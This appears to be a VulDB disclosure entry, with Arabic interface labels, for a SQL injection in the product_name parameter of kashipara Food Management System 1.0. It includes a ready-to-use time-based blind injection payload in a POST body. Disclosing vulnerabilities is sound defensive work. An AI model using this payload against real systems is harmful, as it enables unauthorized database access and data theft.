إرسال #261891: kashipara Food Management System ≤1.0 SQL injectionالمعلومات

عنوانkashipara Food Management System ≤1.0 SQL injection
الوصفSQL injection vulnerability exists in product_name parameter of rawstock_used_damaged_smt.php file of Food Management System Important user data or system data may be leaked and system security may be compromised The environment is secure and the information can be used by malicious users. Payload: in_date=03-01-2024&product_name=2&product_name[]=1" AND (SELECT 9140 FROM (SELECT(SLEEP(5)))bBTT) AND "zaGY"="zaGY&product_price=1&product_used=1&product_used[]=0&submit=Save&used_damaged=product_used&used_damaged[]=product_used
المصدر⚠️ https://github.com/E1CHO/cve_hub/blob/main/Food%20Management%20System/Food%20Management%20System%20-%20vuln%205.pdf
المستخدم
 SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936)
ارسال03/01/2024 11:11 AM (3 سنوات منذ)
الاعتدال06/01/2024 11:15 AM (3 days later)
الحالةتمت الموافقة
إدخال VulDB249831 [Kashipara Food Management System حتى 1.0 rawstock_used_damaged_smt.php product_name حقن SQL]
النقاط20

Want to stay up to date on a daily basis?

Enable the mail alert feature now!